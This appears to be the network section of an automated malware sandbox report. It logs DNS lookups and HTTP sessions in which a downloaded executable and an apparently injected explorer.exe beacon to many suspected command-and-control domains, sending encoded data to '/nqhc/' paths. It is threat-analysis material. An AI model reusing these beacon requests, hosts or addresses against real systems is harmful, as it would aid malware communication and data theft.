                                                                                                                                                                                    Nov 21, 2022 19:25:52.773005962 CET53511431.1.1.1192.168.11.20
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Nov 21, 2022 19:18:35.493346930 CET192.168.11.201.1.1.10xcceaStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:18:36.112219095 CET192.168.11.201.1.1.10xfaa9Standard query (0)doc-00-7s-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.463752031 CET192.168.11.201.1.1.10x2078Standard query (0)www.labour-office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:17.053335905 CET192.168.11.201.1.1.10x11bStandard query (0)www.searchbot.suA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:28.909107924 CET192.168.11.201.1.1.10x8237Standard query (0)www.youlian.fundA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:41.468679905 CET192.168.11.201.1.1.10x87f3Standard query (0)www.royaltechglobal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:03.573359013 CET192.168.11.201.1.1.10x8c7cStandard query (0)www.xiaoxiuzhen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:15.820621967 CET192.168.11.201.1.1.10xb34eStandard query (0)www.gumba.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:27.865325928 CET192.168.11.201.1.1.10x78cStandard query (0)www.botbillionsblaze.websiteA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:39.315855026 CET192.168.11.201.1.1.10x7e89Standard query (0)www.005404.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:51.673074007 CET192.168.11.201.1.1.10x9312Standard query (0)www.westinotion.techA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:59.749109983 CET192.168.11.201.1.1.10x3002Standard query (0)www.gouldent.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:11.964452028 CET192.168.11.201.1.1.10x1750Standard query (0)www.apidachicago.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:23.369260073 CET192.168.11.201.1.1.10x83f0Standard query (0)www.funknive.chA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:34.584777117 CET192.168.11.201.1.1.10xa098Standard query (0)www.noprostatit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:42.646064043 CET192.168.11.201.1.1.10xb4bfStandard query (0)www.xn--29-oj9ik7b890b.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:55.394001961 CET192.168.11.201.1.1.10x12baStandard query (0)www.phootka.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:23:06.905802965 CET192.168.11.201.1.1.10xc107Standard query (0)www.wellnessprodia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:25:09.722239017 CET192.168.11.201.1.1.10xdff3Standard query (0)www.westinotion.techA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:25:41.544147015 CET192.168.11.201.1.1.10xa6afStandard query (0)www.codemars.academyA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:25:52.714576006 CET192.168.11.201.1.1.10xfd16Standard query (0)www.plentywindshield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Nov 21, 2022 19:18:35.502964020 CET1.1.1.1192.168.11.200xcceaNo error (0)drive.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:18:36.161132097 CET1.1.1.1192.168.11.200xfaa9No error (0)doc-00-7s-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:18:36.161132097 CET1.1.1.1192.168.11.200xfaa9No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET1.1.1.1192.168.11.200x2078No error (0)www.labour-office.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:17.237447023 CET1.1.1.1192.168.11.200x11bNo error (0)www.searchbot.su45.130.41.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:29.231910944 CET1.1.1.1192.168.11.200x8237No error (0)www.youlian.fund154.204.24.45A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:41.793445110 CET1.1.1.1192.168.11.200x87f3No error (0)www.royaltechglobal.comroyaltechglobal.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:20:41.793445110 CET1.1.1.1192.168.11.200x87f3No error (0)royaltechglobal.com192.185.32.157A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:03.919292927 CET1.1.1.1192.168.11.200x8c7cNo error (0)www.xiaoxiuzhen.com38.55.15.214A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:16.041558027 CET1.1.1.1192.168.11.200xb34eNo error (0)www.gumba.shop3.13.90.76A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:16.041558027 CET1.1.1.1192.168.11.200xb34eNo error (0)www.gumba.shop18.117.28.81A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:16.041558027 CET1.1.1.1192.168.11.200xb34eNo error (0)www.gumba.shop3.19.100.43A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:28.099550009 CET1.1.1.1192.168.11.200x78cNo error (0)www.botbillionsblaze.websitebotbillionsblaze.websiteCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:28.099550009 CET1.1.1.1192.168.11.200x78cNo error (0)botbillionsblaze.website2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:39.665604115 CET1.1.1.1192.168.11.200x7e89No error (0)www.005404.com103.63.2.175A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:51.688684940 CET1.1.1.1192.168.11.200x9312Name error (3)www.westinotion.technonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:21:59.936533928 CET1.1.1.1192.168.11.200x3002No error (0)www.gouldent.site66.29.151.40A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:12.179430008 CET1.1.1.1192.168.11.200x1750No error (0)www.apidachicago.org194.245.148.189A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:23.404802084 CET1.1.1.1192.168.11.200x83f0No error (0)www.funknive.ch185.101.158.239A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:34.597623110 CET1.1.1.1192.168.11.200xa098Name error (3)www.noprostatit.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:43.014297009 CET1.1.1.1192.168.11.200xb4bfNo error (0)www.xn--29-oj9ik7b890b.netxn--29-oj9ik7b890b.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:43.014297009 CET1.1.1.1192.168.11.200xb4bfNo error (0)xn--29-oj9ik7b890b.net50.87.192.144A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:22:55.544795990 CET1.1.1.1192.168.11.200x12baNo error (0)www.phootka.ru195.24.68.23A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:23:07.372371912 CET1.1.1.1192.168.11.200xc107No error (0)www.wellnessprodia.comwellnessprodia.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:23:07.372371912 CET1.1.1.1192.168.11.200xc107No error (0)wellnessprodia.com192.232.217.125A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:25:09.734272957 CET1.1.1.1192.168.11.200xdff3Name error (3)www.westinotion.technonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:25:41.574528933 CET1.1.1.1192.168.11.200xa6afNo error (0)www.codemars.academy217.160.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 21, 2022 19:25:52.773005962 CET1.1.1.1192.168.11.200xfd16No error (0)www.plentywindshield.com96.43.100.185A (IP address)IN (0x0001)false
                                                                                                                                                                                    • drive.google.com
                                                                                                                                                                                    • doc-00-7s-docs.googleusercontent.com
                                                                                                                                                                                    • www.labour-office.com
                                                                                                                                                                                    • www.searchbot.su
                                                                                                                                                                                    • www.youlian.fund
                                                                                                                                                                                    • www.royaltechglobal.com
                                                                                                                                                                                    • www.xiaoxiuzhen.com
                                                                                                                                                                                    • www.gumba.shop
                                                                                                                                                                                    • www.botbillionsblaze.website
                                                                                                                                                                                    • www.005404.com
                                                                                                                                                                                    • www.gouldent.site
                                                                                                                                                                                    • www.apidachicago.org
                                                                                                                                                                                    • www.funknive.ch
                                                                                                                                                                                    • www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    • www.phootka.ru
                                                                                                                                                                                    • www.wellnessprodia.com
                                                                                                                                                                                    • www.codemars.academy
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    0192.168.11.2049818142.250.185.78443C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    1192.168.11.2049819142.250.185.161443C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    10192.168.11.2049833154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:36.223881960 CET610OUTGET /nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.youlian.fund
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:20:36.465393066 CET610INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:36 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1.0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    11192.168.11.2049834192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:41.910698891 CET611OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.royaltechglobal.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 7a 47 33 66 35 68 71 30 38 6c 61 6d 77 54 76 44 61 52 38 75 68 76 6e 45 6f 57 6b 63 73 68 7e 34 67 78 35 64 39 38 46 54 59 35 68 79 65 75 33 75 78 2d 45 78 58 73 6e 69 4a 47 31 68 62 35 6f 35 74 58 44 6d 35 54 67 49 38 36 61 65 50 32 6f 6d 6f 73 68 5a 49 70 39 47 72 49 38 42 48 44 74 47 6c 68 47 71 70 34 51 65 4f 31 79 59 7a 68 6e 34 37 47 4f 49 44 50 59 4a 6b 37 34 31 68 69 6f 45 75 39 54 37 5a 4f 7a 53 31 7a 6d 39 47 79 66 31 4e 50 68 71 6b 6f 7a 70 47 4e 34 76 42 6a 33 72 4c 5f 33 4b 64 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=cCD7hmI-Mx(gzG3f5hq08lamwTvDaR8uhvnEoWkcsh~4gx5d98FTY5hyeu3ux-ExXsniJG1hb5o5tXDm5TgI86aeP2omoshZIp9GrI8BHDtGlhGqp4QeO1yYzhn47GOIDPYJk741hioEu9T7ZOzS1zm9Gyf1NPhqkozpGN4vBj3rL_3Kdw).
                                                                                                                                                                                    Nov 21, 2022 19:20:42.280814886 CET613INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:41 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 13045
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                                    Data Ascii: rksg1\- "c+;OR&0`bto$_;Uwo"gzW^O}}? pwoIF9S/N`LzX`r}^O;h<!d$J`/osO'A38c\*HS',6 1-/uNg&kkZP&5H/qM_d(^#$1\;ETKw?5`tXnD&ZTk|+:J!v?~9w~I8?Ef>Wz,|9,^PrJ(M)iyUd'_d?=EA.5B8jB3M`[\df2$>n]e5ZF'iw(O`dhIy*\-gycs[L&[/peYP{(0 ;~;?y;W\$5M4N,Iq3/8}N qR/HTG68REn]^mfwS)/,-vwgHg&kkm4cab2a&%&I)r^$2NI\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                                    Nov 21, 2022 19:20:42.280906916 CET614INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f be d7 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                                    Data Ascii: PKTK?e%,{RXE~|'q)suBFD<uomZe~{:<MC5^dUQ,@f~h8LNx!,0ho!95oFTvb"t(@M]&.CS~s{a%IF.zy%W+6lcmre~=DV
                                                                                                                                                                                    Nov 21, 2022 19:20:42.280971050 CET615INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba df 44 48 6b e9 7e d0 03
                                                                                                                                                                                    Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$EDHk~oLo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281033039 CET617INData Raw: 2c 70 7b 0c 52 1e 97 90 b6 2c ab 78 e3 20 e8 bb 69 af f6 40 59 f6 c8 2a 32 66 dc b0 40 96 62 59 cc 96 55 73 86 f6 28 8c 82 3f 0a a6 20 76 ad d3 d6 92 98 db e9 2c a7 71 cc 44 b2 f0 78 29 72 d3 6b 6f 5e 97 14 17 96 ab d6 0c 89 a6 c0 92 d4 94 10 1f
                                                                                                                                                                                    Data Ascii: ,p{R,x i@Y*2f@bYUs(? v,qDx)rko^iSD3(2,5=*E4gr&*P.a#Qc)Dq@b})99CD@{jTujCb6S=-9gHrzH`Auvu*B6BDB=t6vtM/8()
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281115055 CET618INData Raw: d7 3e d9 90 72 82 29 5d af 79 64 53 6e 7b 93 14 14 ec 7b 4c a3 10 53 59 18 77 c4 e1 fa e0 26 a1 b9 1d a8 6b 73 42 19 4f c9 4a 86 9c 90 21 f1 28 67 89 e0 30 32 37 18 a1 68 61 7b 3e cb 50 4f 26 5c 26 38 c3 b5 6b 43 15 be 34 ef 84 41 c4 38 ca a3 e0
                                                                                                                                                                                    Data Ascii: >r)]ydSn{{LSYw&ksBOJ!(g027ha{>PO&\&8kC4A8%Hk4@P7ue#0<aY.bl~~$6"IWj]/.Xmf!];aI{dLNrrpr28ppl`+Z6p}3GN{~\f =R
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281213999 CET619INData Raw: ca ca 1f 3e a2 87 17 9c 86 87 af 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 df d2 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d
                                                                                                                                                                                    Data Ascii: >Euu1^(ejKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD~i`Z3m0Xi?;T{F24~_PY<H@i{BSR.e/"rS^s)b0+Ja{?13_9HS->B%ic
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281302929 CET621INData Raw: 5a ef 91 0c 62 46 07 7b 94 f3 3d e2 0f 77 fb 9c 89 2b 82 3b 19 ec 69 74 3a e8 14 c0 ec 11 16 0f f6 c6 13 37 a6 ea ca 0d b9 8c ae dc f2 d5 2d 21 52 05 a3 c1 5e 6a 4c de f3 7d 25 a7 94 1b 88 d2 84 cb 90 72 2f 92 99 3f c9 dd 48 0a 03 c2 f8 26 85 0c
                                                                                                                                                                                    Data Ascii: ZbF{=w+;it:7-!R^jL}%r/?H&_cTk02KX/@7=R%`"W;,w|CRm3/Y(J,z8Bp7&&?DG@*bwrTs9pvK)rk Jmd2x4
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281366110 CET622INData Raw: e3 a3 ee e7 f7 b7 77 8c b8 9d e3 66 b7 ec d3 c6 8e ad 15 0e 4b 38 cf 36 e0 04 75 47 7f 8d 3a 73 c9 d0 34 40 98 68 0d 9c 0b 59 a8 08 be 57 34 4f 59 e4 10 99 83 a2 46 aa 81 c3 44 0d 53 8a 87 87 ca 32 d6 d6 c3 3e 7e 91 eb 8c 0b ec 97 1a 93 f7 7c 7f
                                                                                                                                                                                    Data Ascii: wfK86uG:s4@hYW4OYFDS2>~|2x'UM3<VC&,6iiX8QgD^Lqfs#rpPK^8#FGSgDA"jj23!*UbFlNmmi+;`
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281465054 CET623INData Raw: f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 0c 7f 90 19 f4 7d 8a 3b e0 6c b8 bb 86 d6 d1 e3 b4 72 a9 cd a5 3d dd 67 96 d3 64 39 8a 68 5b f1 f2 69 28 0b e3 16 da 77 86 cf ec 91 fc a2 37 b2 3c fe ac 2c 8f b7 64 19 49 61 68 54 f3 3c af 2e 8f 31
                                                                                                                                                                                    Data Ascii: |_)42d};lr=gd9h[i(w7<,dIahT<.1=LOd1h</H^|#2WlL)VpMJ"?WsX/8c63OTG7,oGA22:!AH!O.c.mtbD5Q4}636r\E"c6{h
                                                                                                                                                                                    Nov 21, 2022 19:20:42.281562090 CET625INData Raw: 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 5e d1 cf 40 aa 53 8a 95 2b c6 3f 1d ab 5d b1 42 87 df c5 42 d7 f6 7d 5d fa 19 2f 7d 1d 29 96 1b 62 a6 39 1a dd c0 b5 f1 df d3 31 ad a2 ce 70 d7 ff 1b e9 3f f9 ed fc db 67 6f 9f fd 46 fe e6 ef
                                                                                                                                                                                    Data Ascii: ;`YCUP>k^@S+?]BB}]/})b91p?goFYr3J2 0/8>q,6CvwfxDyJEyATs@'#^`lMC;Jl`B~}hCK1K0
                                                                                                                                                                                    Nov 21, 2022 19:20:42.397725105 CET625INData Raw: 2e 9f e5 67 a1 db 74 86 b8 83 52 f0 99 de 93 c9 c4 1b 4f d0 14 19 e8 52 ec ea e8 8f 14 80 1b 53 75 e5 4e a4 8a 73 05 5a bb e5 93 4f 0c 55 09 98 c1 de 65 c8 a9 b8 da 1b 7e 8b 59 e4 57 cc fa d9 66 91 b7 36 ab 54 ff f9 94 fc fd d7 f2 8a db c8 ef 73
                                                                                                                                                                                    Data Ascii: .gtRORSuNsZOUe~YWf6Tstq(6&#r)*%'.-s|\@hk;c| {X,;._~eGdrC4%cZE"LT.v1Q7>SE\P2 7f~Q


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    12192.168.11.2049835192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:44.051480055 CET627OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.royaltechglobal.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
